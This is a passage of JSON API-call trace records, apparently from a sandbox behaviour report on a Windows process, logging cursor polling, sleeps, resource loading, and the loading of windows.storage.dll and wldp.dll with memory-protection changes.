"value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\bcryptPrimitives" }, { "name": "DllBase", "value": "0x76370000" } ], "repeated": 0, "id": 1020 }, { "timestamp": "2025-03-02 21:32:33,467", "thread_id": "7632", "caller": "0x00462dc8", "parentcaller": "0x00462430", "category": "misc", "api": "GetCursorPos", "status": true, "return": "0x00000001", "arguments": [ { "name": "x", "value": "842" }, { "name": "y", "value": "636" } ], "repeated": 0, "id": 1021 }, { "timestamp": "2025-03-02 21:33:13,482", "thread_id": "7632", "caller": "0x00442004", "parentcaller": "0x00000000", "category": "synchronization", "api": "NtFindAtom", "status": true, "return": "0x00000000", "arguments": [ { "name": "AtomName", "value": "ControlOfs0040000000001DD0" }, { "name": "Atom", "value": "0x0000c087" } ], "repeated": 0, "id": 1022 }, { "timestamp": "2025-03-02 21:33:13,482", "thread_id": "7632", "caller": "0x00462dc8", "parentcaller": "0x00462430", "category": "misc", "api": "GetCursorPos", "status": true, "return": "0x00000001", "arguments": [ { "name": "x", "value": "1023" }, { "name": "y", "value": "705" } ], "repeated": 0, "id": 1023 }, { "timestamp": "2025-03-02 21:33:14,482", "thread_id": "7632", "caller": "0x00442004", "parentcaller": "0x00000000", "category": "synchronization", "api": "NtFindAtom", "status": true, "return": "0x00000000", "arguments": [ { "name": "AtomName", "value": "ControlOfs0040000000001DD0" }, { "name": "Atom", "value": "0x0000c087" } ], "repeated": 0, "id": 1024 }, { "timestamp": "2025-03-02 21:33:14,482", "thread_id": "7632", "caller": "0x00462dc8", "parentcaller": "0x00462430", "category": "misc", "api": "GetCursorPos", "status": true, "return": "0x00000001", "arguments": [ { "name": "x", "value": "1023" }, { "name": "y", "value": "705" } ], "repeated": 0, "id": 1025 }, { "timestamp": "2025-03-02 21:33:15,482", "thread_id": "7632", "caller": "0x00442004", "parentcaller": "0x00000000", "category": "synchronization", "api": "NtFindAtom", "status": true, "return": "0x00000000", "arguments": [ { "name": "AtomName", "value": "ControlOfs0040000000001DD0" }, { "name": "Atom", "value": "0x0000c087" } ], "repeated": 0, "id": 1026 }, { "timestamp": "2025-03-02 21:33:15,482", "thread_id": "7632", "caller": "0x0048ca58", "parentcaller": "0x0048e5e7", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "500" } ], "repeated": 0, "id": 1027 }, { "timestamp": "2025-03-02 21:33:16,092", "thread_id": "7632", "caller": "0x00417ee8", "parentcaller": "0x00417e0e", "category": "misc", "api": "FindResourceExA", "status": true, "return": "0x004a5b60", "arguments": [ { "name": "Module", "value": "0x00400000" }, { "name": "Type", "value": "#10" }, { "name": "Name", "value": "DVCLAL" }, { "name": "Language", "value": "0x00000000" } ], "repeated": 0, "id": 1028 }, { "timestamp": "2025-03-02 21:33:16,092", "thread_id": "7632", "caller": "0x00417f02", "parentcaller": "0x00417e0e", "category": "misc", "api": "LoadResource", "status": true, "return": "0x004d4568", "arguments": [ { "name": "Module", "value": "0x00400000" }, { "name": "ResourceInfo", "value": "0x004a5b60" } ], "repeated": 0, "id": 1029 }, { "timestamp": "2025-03-02 21:33:16,092", "thread_id": "7632", "caller": "0x00417f1c", "parentcaller": "0x00417e0e", "category": "misc", "api": "SizeofResource", "status": true, "return": "0x00000010", "arguments": [ { "name": "ModuleHandle", "value": "0x00400000" }, { "name": "ResourceInfo", "value": "0x004a5b60" } ], "repeated": 0, "id": 1030 }, { "timestamp": "2025-03-02 21:33:16,092", "thread_id": "7632", "caller": "0x00417f26", "parentcaller": "0x00417e0e", "category": "misc", "api": "LockResource", "status": true, "return": "0x004d4568", "arguments": [ { "name": "ResourceData", "value": "0x004d4568" } ], "repeated": 0, "id": 1031 }, { "timestamp": "2025-03-02 21:33:16,092", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtOpenSection", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "SectionHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "windows.storage.dll" } ], "repeated": 0, "id": 1032 }, { "timestamp": "2025-03-02 21:33:16,092", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\windows.storage.dll" } ], "repeated": 0, "id": 1033 }, { "timestamp": "2025-03-02 21:33:16,107", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000028c" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\windows.storage.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 1034 }, { "timestamp": "2025-03-02 21:33:16,107", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000298" }, { "name": "DesiredAccess", "value": "0x0000000d", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x0000028c" } ], "repeated": 0, "id": 1035 }, { "timestamp": "2025-03-02 21:33:16,107", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000298" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x743e0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00618000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1036 }, { "timestamp": "2025-03-02 21:33:16,107", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00002000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1037 }, { "timestamp": "2025-03-02 21:33:16,107", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1038 }, { "timestamp": "2025-03-02 21:33:16,107", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1039 }, { "timestamp": "2025-03-02 21:33:16,107", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7498a000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1040 }, { "timestamp": "2025-03-02 21:33:16,107", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtOpenSection", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "SectionHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "Wldp.dll" } ], "repeated": 0, "id": 1041 }, { "timestamp": "2025-03-02 21:33:16,107", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000298" } ], "repeated": 0, "id": 1042 }, { "timestamp": "2025-03-02 21:33:16,123", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000028c" } ], "repeated": 0, "id": 1043 }, { "timestamp": "2025-03-02 21:33:16,123", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "filesystem", "api": "NtQueryAttributesFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\Wldp.dll" } ], "repeated": 0, "id": 1044 }, { "timestamp": "2025-03-02 21:33:16,123", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\wldp.dll" } ], "repeated": 0, "id": 1045 }, { "timestamp": "2025-03-02 21:33:16,123", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000028c" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wldp.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 1046 }, { "timestamp": "2025-03-02 21:33:16,123", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000298" }, { "name": "DesiredAccess", "value": "0x0000000d", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x0000028c" } ], "repeated": 0, "id": 1047 }, { "timestamp": "2025-03-02 21:33:16,123", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000298" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x743b0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00025000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1048 }, { "timestamp": "2025-03-02 21:33:16,123", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x743d0000" }, { "name": "ModuleName", "value": "Wldp.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1049 }, { "timestamp": "2025-03-02 21:33:16,123", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1050 }, { "timestamp": "2025-03-02 21:33:16,123", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1051 }, { "timestamp": "2025-03-02 21:33:16,123", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x743ce000" }, { "name": "ModuleName", "value": "Wldp.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1052 }, { "timestamp": "2025-03-02 21:33:16,123", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000298" } ], "repeated": 0, "id": 1053 }, { "timestamp": "2025-03-02 21:33:16,123", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000028c" } ], "repeated": 0, "id": 1054 }, { "timestamp": "2025-03-02 21:33:16,123", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7498a000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1055 }, { "timestamp": "2025-03-02 21:33:16,123", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "35" }, { "name": "ProcessInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00o\\x00p\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00D\\x00a\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00o\\x00c\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00e\\x00m\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00d\\x00p\\x00" } ], "repeated": 0, "id": 1056 }, { "timestamp": "2025-03-02 21:33:16,123", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x743ce000" }, { "name": "ModuleName", "value": "Wldp.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1057 }, { "timestamp": "2025-03-02 21:33:16,123", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\Wldp" }, { "name": "DllBase", "value": "0x743b0000" } ], "repeated": 0, "id": 1058 }, { "timestamp": "2025-03-02 21:33:16,154", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\windows.storage" }, { "name": "DllBase", "value": "0x743e0000" } ], "repeated": 0, "id": 1059 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "api-ms-win-eventing-provider-l1-1-0.dll" }, { "name": "ModuleHandle", "value": "0x763d0000" } ], "repeated": 0, "id": 1060 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNELBASE.dll" }, { "name": "ModuleHandle", "value": "0x763d0000" }, { "name": "FunctionName", "value": "EventSetInformation" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77180b80" } ], "repeated": 0, "id": 1061 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\wldp" }, { "name": "BaseAddress", "value": "0x743b0000" }, { "name": "InitRoutine", "value": "0x743b9170" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 1062 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "api-ms-win-core-synch-l1-2-0.dll" }, { "name": "ModuleHandle", "value": "0x763d0000" } ], "repeated": 0, "id": 1063 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNELBASE.dll" }, { "name": "ModuleHandle", "value": "0x763d0000" }, { "name": "FunctionName", "value": "InitializeConditionVariable" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771b5560" } ], "repeated": 0, "id": 1064 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNELBASE.dll" }, { "name": "ModuleHandle", "value": "0x763d0000" }, { "name": "FunctionName", "value": "SleepConditionVariableCS" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x765acd00" } ], "repeated": 0, "id": 1065 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNELBASE.dll" }, { "name": "ModuleHandle", "value": "0x763d0000" }, { "name": "FunctionName", "value": "WakeAllConditionVariable" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771bacc0" } ], "repeated": 0, "id": 1066 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1067 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1068 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 1069 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDllShutdownInProgress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771afa60" } ], "repeated": 0, "id": 1070 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\windows.storage" }, { "name": "BaseAddress", "value": "0x743e0000" }, { "name": "InitRoutine", "value": "0x745bd1f0" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 1071 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x761b9000" }, { "name": "ModuleName", "value": "SHELL32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1072 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x761b9000" }, { "name": "ModuleName", "value": "SHELL32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1073 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1074 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1075 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtOpenSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000002d0" }, { "name": "DesiredAccess", "value": "0x00000006" }, { "name": "ObjectAttributes", "value": "windows_shell_global_counters" } ], "repeated": 0, "id": 1076 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000002d0" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0a920000" }, { "name": "SectionOffset", "value": "0x0019e534" }, { "name": "ViewSize", "value": "0x00001000" }, { "name": "Win32Protect", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1077 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x000002d4" } ], "repeated": 0, "id": 1078 }, { "timestamp": "2025-03-02 21:33:16,217", "thread_id": "7632", "caller": "0x0048c8f1", "parentcaller": "0x0048cb96", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", 